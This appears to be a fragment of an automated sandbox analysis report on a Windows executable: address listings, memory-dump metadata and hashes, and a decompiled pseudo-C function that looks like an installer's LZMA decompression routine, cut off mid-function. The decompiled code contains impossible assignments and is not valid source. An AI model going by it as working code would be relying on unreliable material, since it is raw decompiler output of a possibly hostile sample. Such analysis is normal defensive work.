                                                                                                                              0x0040685b
                                                                                                                              0x00406862
                                                                                                                              0x00406865
                                                                                                                              0x0040686c
                                                                                                                              0x00000000
                                                                                                                              0x0040686f
                                                                                                                              0x0040682a
                                                                                                                              0x0040682a
                                                                                                                              0x0040682d
                                                                                                                              0x00406830
                                                                                                                              0x00406833
                                                                                                                              0x0040683a
                                                                                                                              0x0040677e
                                                                                                                              0x0040677e
                                                                                                                              0x00406781
                                                                                                                              0x00000000
                                                                                                                              0x00000000
                                                                                                                              0x00406915
                                                                                                                              0x00406915
                                                                                                                              0x00406918
                                                                                                                              0x00406819
                                                                                                                              0x00406819
                                                                                                                              0x00406819
                                                                                                                              0x00000000
                                                                                                                              0x0040681f
                                                                                                                              0x00000000
                                                                                                                              0x0040654f
                                                                                                                              0x0040654f
                                                                                                                              0x00406551
                                                                                                                              0x00406558
                                                                                                                              0x00406559
                                                                                                                              0x0040655b
                                                                                                                              0x0040655e
                                                                                                                              0x00000000
                                                                                                                              0x00000000
                                                                                                                              0x00000000
                                                                                                                              0x00000000
                                                                                                                              0x00406862
                                                                                                                              0x00406862
                                                                                                                              0x00406865
                                                                                                                              0x0040686c
                                                                                                                              0x00000000
                                                                                                                              0x0040686f
                                                                                                                              0x00000000
                                                                                                                              0x00000000
                                                                                                                              0x00000000
                                                                                                                              0x00406594
                                                                                                                              0x00406594
                                                                                                                              0x00406597
                                                                                                                              0x004065cd
                                                                                                                              0x004065cd
                                                                                                                              0x004066fd
                                                                                                                              0x004066fd
                                                                                                                              0x004066fd
                                                                                                                              0x004066fd
                                                                                                                              0x00406700
                                                                                                                              0x00406700
                                                                                                                              0x00406703
                                                                                                                              0x00406705
                                                                                                                              0x0040698f
                                                                                                                              0x0040698f
                                                                                                                              0x00000000
                                                                                                                              0x0040698f
                                                                                                                              0x0040670b
                                                                                                                              0x0040670b
                                                                                                                              0x0040670e
                                                                                                                              0x00000000
                                                                                                                              0x00000000
                                                                                                                              0x00406714
                                                                                                                              0x00406714
                                                                                                                              0x00406718
                                                                                                                              0x0040671b
                                                                                                                              0x0040671b
                                                                                                                              0x0040671b
                                                                                                                              0x00000000
                                                                                                                              0x0040671b
                                                                                                                              0x00406599
                                                                                                                              0x00406599
                                                                                                                              0x0040659b
                                                                                                                              0x0040659d
                                                                                                                              0x0040659f
                                                                                                                              0x004065a2
                                                                                                                              0x004065a3
                                                                                                                              0x004065a5
                                                                                                                              0x004065a7
                                                                                                                              0x004065aa
                                                                                                                              0x004065ad
                                                                                                                              0x004065c3
                                                                                                                              0x004065c3
                                                                                                                              0x004065c8
                                                                                                                              0x00406600
                                                                                                                              0x00406600
                                                                                                                              0x00406604
                                                                                                                              0x0040662d
                                                                                                                              0x00406630
                                                                                                                              0x00406632
                                                                                                                              0x00406639
                                                                                                                              0x0040663c
                                                                                                                              0x0040663f
                                                                                                                              0x0040663f
                                                                                                                              0x00406644
                                                                                                                              0x00406644
                                                                                                                              0x00406646
                                                                                                                              0x00406649
                                                                                                                              0x00406650
                                                                                                                              0x00406653
                                                                                                                              0x00406680
                                                                                                                              0x00406680
                                                                                                                              0x00406683
                                                                                                                              0x00406686
                                                                                                                              0x004066fa
                                                                                                                              0x004066fa
                                                                                                                              0x004066fa
                                                                                                                              0x004066fa
                                                                                                                              0x00000000
                                                                                                                              0x004066fa
                                                                                                                              0x00406688
                                                                                                                              0x00406688
                                                                                                                              0x0040668e
                                                                                                                              0x00406691
                                                                                                                              0x00406694
                                                                                                                              0x00406697
                                                                                                                              0x0040669a
                                                                                                                              0x0040669d
                                                                                                                              0x004066a0
                                                                                                                              0x004066a3
                                                                                                                              0x004066a6
                                                                                                                              0x004066a9
                                                                                                                              0x004066c2
                                                                                                                              0x004066c4
                                                                                                                              0x004066c7
                                                                                                                              0x004066c8
                                                                                                                              0x004066cb
                                                                                                                              0x004066cd
                                                                                                                              0x004066d0
                                                                                                                              0x004066d2
                                                                                                                              0x004066d4
                                                                                                                              0x004066d7
                                                                                                                              0x004066d9
                                                                                                                              0x004066dc
                                                                                                                              0x004066e0
                                                                                                                              0x004066e2
                                                                                                                              0x004066e2
                                                                                                                              0x004066e3
                                                                                                                              0x004066e6
                                                                                                                              0x004066e9
                                                                                                                              0x004066ab
                                                                                                                              0x004066ab
                                                                                                                              0x004066b3
                                                                                                                              0x004066b8
                                                                                                                              0x004066ba
                                                                                                                              0x004066bd
                                                                                                                              0x004066bd
                                                                                                                              0x004066ec
                                                                                                                              0x004066f3
                                                                                                                              0x0040667d
                                                                                                                              0x0040667d
                                                                                                                              0x0040667d
                                                                                                                              0x0040667d
                                                                                                                              0x00000000
                                                                                                                              0x004066f5
                                                                                                                              0x004066f5
                                                                                                                              0x00000000
                                                                                                                              0x004066f5
                                                                                                                              0x004066f3
                                                                                                                              0x00406606
                                                                                                                              0x00406606
                                                                                                                              0x00406609
                                                                                                                              0x0040660b
                                                                                                                              0x0040660e
                                                                                                                              0x00406611
                                                                                                                              0x00406614
                                                                                                                              0x00406616
                                                                                                                              0x00406619
                                                                                                                              0x0040661c
                                                                                                                              0x0040661c
                                                                                                                              0x0040661f
                                                                                                                              0x0040661f
                                                                                                                              0x00406622
                                                                                                                              0x00406629
                                                                                                                              0x004065fd
                                                                                                                              0x004065fd
                                                                                                                              0x004065fd
                                                                                                                              0x004065fd
                                                                                                                              0x00000000
                                                                                                                              0x0040662b
                                                                                                                              0x0040662b
                                                                                                                              0x00000000
                                                                                                                              0x0040662b
                                                                                                                              0x00406629
                                                                                                                              0x004065af
                                                                                                                              0x004065af
                                                                                                                              0x004065b2
                                                                                                                              0x004065b4
                                                                                                                              0x004065b7
                                                                                                                              0x00000000
                                                                                                                              0x00000000
                                                                                                                              0x00406316
                                                                                                                              0x00406316
                                                                                                                              0x0040631a
                                                                                                                              0x0040695f
                                                                                                                              0x0040695f
                                                                                                                              0x00000000
                                                                                                                              0x0040695f
                                                                                                                              0x00406320
                                                                                                                              0x00406320
                                                                                                                              0x00406323
                                                                                                                              0x00406326
                                                                                                                              0x00406329
                                                                                                                              0x0040632c
                                                                                                                              0x0040632f
                                                                                                                              0x00406332
                                                                                                                              0x00406334
                                                                                                                              0x00406337
                                                                                                                              0x0040633a
                                                                                                                              0x0040633d
                                                                                                                              0x0040633f
                                                                                                                              0x0040633f
                                                                                                                              0x0040633f
                                                                                                                              0x00000000
                                                                                                                              0x00000000
                                                                                                                              0x004064a1
                                                                                                                              0x004064a1
                                                                                                                              0x004064a5
                                                                                                                              0x0040696b
                                                                                                                              0x0040696b
                                                                                                                              0x00000000
                                                                                                                              0x0040696b
                                                                                                                              0x004064ab
                                                                                                                              0x004064ab
                                                                                                                              0x004064ae
                                                                                                                              0x004064b1
                                                                                                                              0x004064b4
                                                                                                                              0x004064b6
                                                                                                                              0x004064b6
                                                                                                                              0x004064b6
                                                                                                                              0x004064b9
                                                                                                                              0x004064bc
                                                                                                                              0x004064bf
                                                                                                                              0x004064c2
                                                                                                                              0x004064c5
                                                                                                                              0x004064c8
                                                                                                                              0x004064c9
                                                                                                                              0x004064cb
                                                                                                                              0x004064cb
                                                                                                                              0x004064cb
                                                                                                                              0x004064ce
                                                                                                                              0x004064d1
                                                                                                                              0x004064d4
                                                                                                                              0x004064d7
                                                                                                                              0x004064d7
                                                                                                                              0x004064d7
                                                                                                                              0x004064da
                                                                                                                              0x004064dc
                                                                                                                              0x004064dc
                                                                                                                              0x00000000
                                                                                                                              0x00000000
                                                                                                                              0x0040671e
                                                                                                                              0x0040671e
                                                                                                                              0x0040671e
                                                                                                                              0x00406722
                                                                                                                              0x00000000
                                                                                                                              0x00000000
                                                                                                                              0x00406728
                                                                                                                              0x00406728
                                                                                                                              0x0040672b
                                                                                                                              0x0040672e
                                                                                                                              0x00406731
                                                                                                                              0x00406733
                                                                                                                              0x00406733
                                                                                                                              0x00406733
                                                                                                                              0x00406736
                                                                                                                              0x00406739
                                                                                                                              0x0040673c
                                                                                                                              0x0040673f
                                                                                                                              0x00406742
                                                                                                                              0x00406745
                                                                                                                              0x00406746
                                                                                                                              0x00406748
                                                                                                                              0x00406748
                                                                                                                              0x00406748
                                                                                                                              0x0040674b
                                                                                                                              0x0040674e
                                                                                                                              0x00406751
                                                                                                                              0x00406754
                                                                                                                              0x00406757
                                                                                                                              0x0040675b
                                                                                                                              0x0040675d
                                                                                                                              0x00406760
                                                                                                                              0x00000000
                                                                                                                              0x00406762
                                                                                                                              0x00406762
                                                                                                                              0x004064df
                                                                                                                              0x004064df
                                                                                                                              0x00000000
                                                                                                                              0x004064df
                                                                                                                              0x00406760
                                                                                                                              0x00406995
                                                                                                                              0x00406995
                                                                                                                              0x00000000
                                                                                                                              0x00000000
                                                                                                                              0x00405fc4
                                                                                                                              0x004069cc
                                                                                                                              0x004069cc
                                                                                                                              0x00000000
                                                                                                                              0x004069cc
                                                                                                                              0x00406819
                                                                                                                              0x00406899
                                                                                                                              0x00406862

                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000000.00000002.201984153.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                              • Associated: 00000000.00000002.201978360.0000000000400000.00000002.00020000.sdmp Download File
                                                                                                                              • Associated: 00000000.00000002.201994006.0000000000407000.00000002.00020000.sdmp Download File
                                                                                                                              • Associated: 00000000.00000002.202000566.0000000000409000.00000004.00020000.sdmp Download File
                                                                                                                              • Associated: 00000000.00000002.202075629.0000000000422000.00000004.00020000.sdmp Download File
                                                                                                                              • Associated: 00000000.00000002.202089293.0000000000429000.00000004.00020000.sdmp Download File
                                                                                                                              • Associated: 00000000.00000002.202121649.000000000042C000.00000002.00020000.sdmp Download File
                                                                                                                              • Associated: 00000000.00000002.202148009.000000000042F000.00000002.00020000.sdmp Download File
                                                                                                                              • Associated: 00000000.00000002.202159816.0000000000433000.00000002.00020000.sdmp Download File
                                                                                                                              • Associated: 00000000.00000002.202170813.0000000000437000.00000002.00020000.sdmp Download File
                                                                                                                              • Associated: 00000000.00000002.202189588.000000000043A000.00000002.00020000.sdmp Download File
                                                                                                                              • Associated: 00000000.00000002.202210290.000000000043C000.00000002.00020000.sdmp Download File
                                                                                                                              Similarity
                                                                                                                              • API ID:
                                                                                                                              • String ID:
                                                                                                                              • API String ID:
                                                                                                                              • Opcode ID: b47bfdafb4299acf6df14b1a265fb959f908a42d38d0bc6d60d6342fbb02c28f
                                                                                                                              • Instruction ID: 319d18918fa2cc3741333e20ed782d5c303dd2f769888eebbc994f2124d7c2e6
                                                                                                                              • Opcode Fuzzy Hash: b47bfdafb4299acf6df14b1a265fb959f908a42d38d0bc6d60d6342fbb02c28f
                                                                                                                              • Instruction Fuzzy Hash: 29A15171E00229CBDF28CFA8C8547ADBBB1FF44305F15812AD856BB281D7789A96DF44
                                                                                                                              Uniqueness

                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                              Function 00406767, Relevance: 5.2, APIs: 4, Instructions: 208COMMON
                                                                                                                              Download Yara Rule
                                                                                                                              C-Code - Quality: 98%
                                                                                                                              			E00406767() {
				void _t533;
				signed int _t534;
				signed int _t535;
				signed int* _t605;
				void* _t612;

				L0:
				while(1) {
					L0:
					if( *(_t612 - 0x40) != 0) {
						 *(_t612 - 0x84) = 0x13;
						_t605 =  *((intOrPtr*)(_t612 - 0x58)) + 2;
						goto L132;
					} else {
						__eax =  *(__ebp - 0x4c);
						 *(__ebp - 0x30) =  *(__ebp - 0x30) & 0x00000000;
						__ecx =  *(__ebp - 0x58);
						__eax =  *(__ebp - 0x4c) << 4;
						__eax =  *(__ebp - 0x58) + __eax + 4;
						L130:
						 *(__ebp - 0x58) = __eax;
						 *(__ebp - 0x40) = 3;
						L144:
						 *(__ebp - 0x7c) = 0x14;
						L145:
						__eax =  *(__ebp - 0x40);
						 *(__ebp - 0x50) = 1;
						 *(__ebp - 0x48) =  *(__ebp - 0x40);
						L149:
						if( *(__ebp - 0x48) <= 0) {
							__ecx =  *(__ebp - 0x40);
							__ebx =  *(__ebp - 0x50);
							0 = 1;
							__eax = 1 << __cl;
							__ebx =  *(__ebp - 0x50) - (1 << __cl);
							__eax =  *(__ebp - 0x7c);
							 *(__ebp - 0x44) = __ebx;
							while(1) {
								L140:
								 *(_t612 - 0x88) = _t533;
								while(1) {
									L1:
									_t534 =  *(_t612 - 0x88);
									if(_t534 > 0x1c) {
										break;
									}
									switch( *((intOrPtr*)(_t534 * 4 +  &M004069D4))) {
										case 0:
											if( *(_t612 - 0x6c) == 0) {
												goto L170;
											}
											 *(_t612 - 0x6c) =  *(_t612 - 0x6c) - 1;
											 *(_t612 - 0x70) =  &(( *(_t612 - 0x70))[1]);
											_t534 =  *( *(_t612 - 0x70));
											if(_t534 > 0xe1) {
												goto L171;
											}
											_t538 = _t534 & 0x000000ff;
											_push(0x2d);
											asm("cdq");
											_pop(_t569);
											_push(9);
											_pop(_t570);
											_t608 = _t538 / _t569;
											_t540 = _t538 % _t569 & 0x000000ff;
											asm("cdq");
											_t603 = _t540 % _t570 & 0x000000ff;
											 *(_t612 - 0x3c) = _t603;
											 *(_t612 - 0x1c) = (1 << _t608) - 1;
											 *((intOrPtr*)(_t612 - 0x18)) = (1 << _t540 / _t570) - 1;
											_t611 = (0x300 << _t603 + _t608) + 0x736;
											if(0x600 ==  *((intOrPtr*)(_t612 - 0x78))) {
												L10:
												if(_t611 == 0) {
													L12:
													 *(_t612 - 0x48) =  *(_t612 - 0x48) & 0x00000000;
													 *(_t612 - 0x40) =  *(_t612 - 0x40) & 0x00000000;
													goto L15;
												} else {
													goto L11;
												}
												do {
													L11:
													_t611 = _t611 - 1;
													 *((short*)( *(_t612 - 4) + _t611 * 2)) = 0x400;
												} while (_t611 != 0);
												goto L12;
											}
											if( *(_t612 - 4) != 0) {
												GlobalFree( *(_t612 - 4));
											}
											_t534 = GlobalAlloc(0x40, 0x600); // executed
											 *(_t612 - 4) = _t534;
											if(_t534 == 0) {
												goto L171;
											} else {
												 *((intOrPtr*)(_t612 - 0x78)) = 0x600;
												goto L10;
											}
										case 1:
											L13:
											__eflags =  *(_t612 - 0x6c);
											if( *(_t612 - 0x6c) == 0) {
												 *(_t612 - 0x88) = 1;
												goto L170;
											}
											 *(_t612 - 0x6c) =  *(_t612 - 0x6c) - 1;
											 *(_t612 - 0x40) =  *(_t612 - 0x40) | ( *( *(_t612 - 0x70)) & 0x000000ff) <<  *(_t612 - 0x48) << 0x00000003;
											 *(_t612 - 0x70) =  &(( *(_t612 - 0x70))[1]);
											_t45 = _t612 - 0x48;
											 *_t45 =  *(_t612 - 0x48) + 1;
											__eflags =  *_t45;
											L15:
											if( *(_t612 - 0x48) < 4) {
												goto L13;
											}
											_t546 =  *(_t612 - 0x40);
											if(_t546 ==  *(_t612 - 0x74)) {
												L20:
												 *(_t612 - 0x48) = 5;
												 *( *(_t612 - 8) +  *(_t612 - 0x74) - 1) =  *( *(_t612 - 8) +  *(_t612 - 0x74) - 1) & 0x00000000;
												goto L23;
											}
											 *(_t612 - 0x74) = _t546;
											if( *(_t612 - 8) != 0) {
												GlobalFree( *(_t612 - 8));
											}
											_t534 = GlobalAlloc(0x40,  *(_t612 - 0x40)); // executed
											 *(_t612 - 8) = _t534;
											if(_t534 == 0) {
												goto L171;
											} else {
												goto L20;
											}
										case 2:
											L24:
											_t553 =  *(_t612 - 0x60) &  *(_t612 - 0x1c);
											 *(_t612 - 0x84) = 6;
											 *(_t612 - 0x4c) = _t553;
											_t605 =  *(_t612 - 4) + (( *(_t612 - 0x38) << 4) + _t553) * 2;
											goto L132;
										case 3:
											L21:
											__eflags =  *(_t612 - 0x6c);
											if( *(_t612 - 0x6c) == 0) {
												 *(_t612 - 0x88) = 3;
												goto L170;
											}
											 *(_t612 - 0x6c) =  *(_t612 - 0x6c) - 1;
											_t67 = _t612 - 0x70;
											 *_t67 =  &(( *(_t612 - 0x70))[1]);
											__eflags =  *_t67;
											 *(_t612 - 0xc) =  *(_t612 - 0xc) << 0x00000008 |  *( *(_t612 - 0x70)) & 0x000000ff;
											L23:
											 *(_t612 - 0x48) =  *(_t612 - 0x48) - 1;
											if( *(_t612 - 0x48) != 0) {
												goto L21;
											}
											goto L24;
										case 4:
											L133:
											_t531 =  *_t605;
											_t588 = _t531 & 0x0000ffff;
											_t564 = ( *(_t612 - 0x10) >> 0xb) * _t588;
											if( *(_t612 - 0xc) >= _t564) {
												 *(_t612 - 0x10) =  *(_t612 - 0x10) - _t564;
												 *(_t612 - 0xc) =  *(_t612 - 0xc) - _t564;
												 *(_t612 - 0x40) = 1;
												_t532 = _t531 - (_t531 >> 5);
												__eflags = _t532;
												 *_t605 = _t532;
											} else {
												 *(_t612 - 0x10) = _t564;
												 *(_t612 - 0x40) =  *(_t612 - 0x40) & 0x00000000;
												 *_t605 = (0x800 - _t588 >> 5) + _t531;
											}
											if( *(_t612 - 0x10) >= 0x1000000) {
												goto L139;
											} else {
												goto L137;
											}
										case 5:
											L137:
											if( *(_t612 - 0x6c) == 0) {
												 *(_t612 - 0x88) = 5;
												goto L170;
											}
											 *(_t612 - 0x10) =  *(_t612 - 0x10) << 8;
											 *(_t612 - 0x6c) =  *(_t612 - 0x6c) - 1;
											 *(_t612 - 0x70) =  &(( *(_t612 - 0x70))[1]);
											 *(_t612 - 0xc) =  *(_t612 - 0xc) << 0x00000008 |  *( *(_t612 - 0x70)) & 0x000000ff;
											L139:
											_t533 =  *(_t612 - 0x84);
											goto L140;
										case 6:
											__edx = 0;
											__eflags =  *(__ebp - 0x40);
											if( *(__ebp - 0x40) != 0) {
												__eax =  *(__ebp - 4);
												__ecx =  *(__ebp - 0x38);
												 *(__ebp - 0x34) = 1;
												 *(__ebp - 0x84) = 7;
												__esi =  *(__ebp - 4) + 0x180 +  *(__ebp - 0x38) * 2;
												goto L132;
											}
											__eax =  *(__ebp - 0x5c) & 0x000000ff;
											__esi =  *(__ebp - 0x60);
											__cl = 8;
											__cl = 8 -  *(__ebp - 0x3c);
											__esi =  *(__ebp - 0x60) &  *(__ebp - 0x18);
											__eax = ( *(__ebp - 0x5c) & 0x000000ff) >> 8;
											__ecx =  *(__ebp - 0x3c);
											__esi = ( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8;
											__ecx =  *(__ebp - 4);
											(( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8) = (( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8) + ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8)) * 2;
											__eax = (( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8) + ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8)) * 2 << 9;
											__eflags =  *(__ebp - 0x38) - 4;
											__eax = ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8) + ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8)) * 2 << 9) +  *(__ebp - 4) + 0xe6c;
											 *(__ebp - 0x58) = ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8) + ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8)) * 2 << 9) +  *(__ebp - 4) + 0xe6c;
											if( *(__ebp - 0x38) >= 4) {
												__eflags =  *(__ebp - 0x38) - 0xa;
												if( *(__ebp - 0x38) >= 0xa) {
													_t98 = __ebp - 0x38;
													 *_t98 =  *(__ebp - 0x38) - 6;
													__eflags =  *_t98;
												} else {
													 *(__ebp - 0x38) =  *(__ebp - 0x38) - 3;
												}
											} else {
												 *(__ebp - 0x38) = 0;
											}
											__eflags =  *(__ebp - 0x34) - __edx;
											if( *(__ebp - 0x34) == __edx) {
												__ebx = 0;
												__ebx = 1;
												goto L61;
											} else {
												__eax =  *(__ebp - 0x14);
												__eax =  *(__ebp - 0x14) -  *(__ebp - 0x2c);
												__eflags = __eax -  *(__ebp - 0x74);
												if(__eax >=  *(__ebp - 0x74)) {
													__eax = __eax +  *(__ebp - 0x74);
													__eflags = __eax;
												}
												__ecx =  *(__ebp - 8);
												__ebx = 0;
												__ebx = 1;
												__al =  *((intOrPtr*)(__eax + __ecx));
												 *(__ebp - 0x5b) =  *((intOrPtr*)(__eax + __ecx));
												goto L41;
											}
										case 7:
											__eflags =  *(__ebp - 0x40) - 1;
											if( *(__ebp - 0x40) != 1) {
												__eax =  *(__ebp - 0x24);
												 *(__ebp - 0x80) = 0x16;
												 *(__ebp - 0x20) =  *(__ebp - 0x24);
												__eax =  *(__ebp - 0x28);
												 *(__ebp - 0x24) =  *(__ebp - 0x28);
												__eax =  *(__ebp - 0x2c);
												 *(__ebp - 0x28) =  *(__ebp - 0x2c);
												__eax = 0;
												__eflags =  *(__ebp - 0x38) - 7;
												0 | __eflags >= 0x00000000 = (__eflags >= 0) - 1;
												__al = __al & 0x000000fd;
												__eax = (__eflags >= 0) - 1 + 0xa;
												 *(__ebp - 0x38) = (__eflags >= 0) - 1 + 0xa;
												__eax =  *(__ebp - 4);
												__eax =  *(__ebp - 4) + 0x664;
												__eflags = __eax;
												 *(__ebp - 0x58) = __eax;
												goto L69;
											}
											__eax =  *(__ebp - 4);
											__ecx =  *(__ebp - 0x38);
											 *(__ebp - 0x84) = 8;
											__esi =  *(__ebp - 4) + 0x198 +  *(__ebp - 0x38) * 2;
											goto L132;
										case 8:
											__eflags =  *(__ebp - 0x40);
											if( *(__ebp - 0x40) != 0) {
												__eax =  *(__ebp - 4);
												__ecx =  *(__ebp - 0x38);
												 *(__ebp - 0x84) = 0xa;
												__esi =  *(__ebp - 4) + 0x1b0 +  *(__ebp - 0x38) * 2;
											} else {
												__eax =  *(__ebp - 0x38);
												__ecx =  *(__ebp - 4);
												__eax =  *(__ebp - 0x38) + 0xf;
												 *(__ebp - 0x84) = 9;
												 *(__ebp - 0x38) + 0xf << 4 = ( *(__ebp - 0x38) + 0xf << 4) +  *(__ebp - 0x4c);
												__esi =  *(__ebp - 4) + (( *(__ebp - 0x38) + 0xf << 4) +  *(__ebp - 0x4c)) * 2;
											}
											goto L132;
										case 9:
											__eflags =  *(__ebp - 0x40);
											if( *(__ebp - 0x40) != 0) {
												goto L90;
											}
											__eflags =  *(__ebp - 0x60);
											if( *(__ebp - 0x60) == 0) {
												goto L171;
											}
											__eax = 0;
											__eflags =  *(__ebp - 0x38) - 7;
											_t259 =  *(__ebp - 0x38) - 7 >= 0;
											__eflags = _t259;
											0 | _t259 = _t259 + _t259 + 9;
											 *(__ebp - 0x38) = _t259 + _t259 + 9;
											goto L76;
										case 0xa:
											__eflags =  *(__ebp - 0x40);
											if( *(__ebp - 0x40) != 0) {
												__eax =  *(__ebp - 4);
												__ecx =  *(__ebp - 0x38);
												 *(__ebp - 0x84) = 0xb;
												__esi =  *(__ebp - 4) + 0x1c8 +  *(__ebp - 0x38) * 2;
												goto L132;
											}
											__eax =  *(__ebp - 0x28);
											goto L89;
										case 0xb:
											__eflags =  *(__ebp - 0x40);
											if( *(__ebp - 0x40) != 0) {
												__ecx =  *(__ebp - 0x24);
												__eax =  *(__ebp - 0x20);
												 *(__ebp - 0x20) =  *(__ebp - 0x24);
											} else {
												__eax =  *(__ebp - 0x24);
											}
											__ecx =  *(__ebp - 0x28);
											 *(__ebp - 0x24) =  *(__ebp - 0x28);
											L89:
											__ecx =  *(__ebp - 0x2c);
											 *(__ebp - 0x2c) = __eax;
											 *(__ebp - 0x28) =  *(__ebp - 0x2c);
											L90:
											__eax =  *(__ebp - 4);
											 *(__ebp - 0x80) = 0x15;
											__eax =  *(__ebp - 4) + 0xa68;
											 *(__ebp - 0x58) =  *(__ebp - 4) + 0xa68;
											goto L69;
										case 0xc:
											L100:
											__eflags =  *(__ebp - 0x6c);
											if( *(__ebp - 0x6c) == 0) {
												 *(__ebp - 0x88) = 0xc;
												goto L170;
											}
											__ecx =  *(__ebp - 0x70);
											__eax =  *(__ebp - 0xc);
											 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
											__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
											 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
											 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
											_t335 = __ebp - 0x70;
											 *_t335 =  *(__ebp - 0x70) + 1;
											__eflags =  *_t335;
											 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
											__eax =  *(__ebp - 0x2c);
											goto L102;
										case 0xd:
											L37:
											__eflags =  *(__ebp - 0x6c);
											if( *(__ebp - 0x6c) == 0) {
												 *(__ebp - 0x88) = 0xd;
												goto L170;
											}
											__ecx =  *(__ebp - 0x70);
											__eax =  *(__ebp - 0xc);
											 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
											__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
											 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
											 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
											_t122 = __ebp - 0x70;
											 *_t122 =  *(__ebp - 0x70) + 1;
											__eflags =  *_t122;
											 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
											L39:
											__eax =  *(__ebp - 0x40);
											__eflags =  *(__ebp - 0x48) -  *(__ebp - 0x40);
											if( *(__ebp - 0x48) !=  *(__ebp - 0x40)) {
												goto L48;
											}
											__eflags = __ebx - 0x100;
											if(__ebx >= 0x100) {
												goto L54;
											}
											L41:
											__eax =  *(__ebp - 0x5b) & 0x000000ff;
											 *(__ebp - 0x5b) =  *(__ebp - 0x5b) << 1;
											__ecx =  *(__ebp - 0x58);
											__eax = ( *(__ebp - 0x5b) & 0x000000ff) >> 7;
											 *(__ebp - 0x48) = __eax;
											__eax = __eax + 1;
											__eax = __eax << 8;
											__eax = __eax + __ebx;
											__esi =  *(__ebp - 0x58) + __eax * 2;
											 *(__ebp - 0x10) =  *(__ebp - 0x10) >> 0xb;
											__ax =  *__esi;
											 *(__ebp - 0x54) = __esi;
											__edx = __ax & 0x0000ffff;
											__ecx = ( *(__ebp - 0x10) >> 0xb) * __edx;
											__eflags =  *(__ebp - 0xc) - __ecx;
											if( *(__ebp - 0xc) >= __ecx) {
												 *(__ebp - 0x10) =  *(__ebp - 0x10) - __ecx;
												 *(__ebp - 0xc) =  *(__ebp - 0xc) - __ecx;
												__cx = __ax;
												 *(__ebp - 0x40) = 1;
												__cx = __ax >> 5;
												__eflags = __eax;
												__ebx = __ebx + __ebx + 1;
												 *__esi = __ax;
											} else {
												 *(__ebp - 0x40) =  *(__ebp - 0x40) & 0x00000000;
												 *(__ebp - 0x10) = __ecx;
												0x800 = 0x800 - __edx;
												0x800 - __edx >> 5 = (0x800 - __edx >> 5) + __eax;
												__ebx = __ebx + __ebx;
												 *__esi = __cx;
											}
											__eflags =  *(__ebp - 0x10) - 0x1000000;
											 *(__ebp - 0x44) = __ebx;
											if( *(__ebp - 0x10) >= 0x1000000) {
												goto L39;
											} else {
												goto L37;
											}
										case 0xe:
											L46:
											__eflags =  *(__ebp - 0x6c);
											if( *(__ebp - 0x6c) == 0) {
												 *(__ebp - 0x88) = 0xe;
												goto L170;
											}
											__ecx =  *(__ebp - 0x70);
											__eax =  *(__ebp - 0xc);
											 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
											__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
											 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
											 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
											_t156 = __ebp - 0x70;
											 *_t156 =  *(__ebp - 0x70) + 1;
											__eflags =  *_t156;
											 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
											while(1) {
												L48:
												__eflags = __ebx - 0x100;
												if(__ebx >= 0x100) {
													break;
												}
												__eax =  *(__ebp - 0x58);
												__edx = __ebx + __ebx;
												__ecx =  *(__ebp - 0x10);
												__esi = __edx + __eax;
												__ecx =  *(__ebp - 0x10) >> 0xb;
												__ax =  *__esi;
												 *(__ebp - 0x54) = __esi;
												__edi = __ax & 0x0000ffff;
												__ecx = ( *(__ebp - 0x10) >> 0xb) * __edi;
												__eflags =  *(__ebp - 0xc) - __ecx;
												if( *(__ebp - 0xc) >= __ecx) {
													 *(__ebp - 0x10) =  *(__ebp - 0x10) - __ecx;
													 *(__ebp - 0xc) =  *(__ebp - 0xc) - __ecx;
													__cx = __ax;
													_t170 = __edx + 1; // 0x1
													__ebx = _t170;
													__cx = __ax >> 5;
													__eflags = __eax;
													 *__esi = __ax;
												} else {
													 *(__ebp - 0x10) = __ecx;
													0x800 = 0x800 - __edi;
													0x800 - __edi >> 5 = (0x800 - __edi >> 5) + __eax;
													__ebx = __ebx + __ebx;
													 *__esi = __cx;
												}
												__eflags =  *(__ebp - 0x10) - 0x1000000;
												 *(__ebp - 0x44) = __ebx;
												if( *(__ebp - 0x10) >= 0x1000000) {
													continue;
												} else {
													goto L46;
												}
											}
											L54:
											_t173 = __ebp - 0x34;
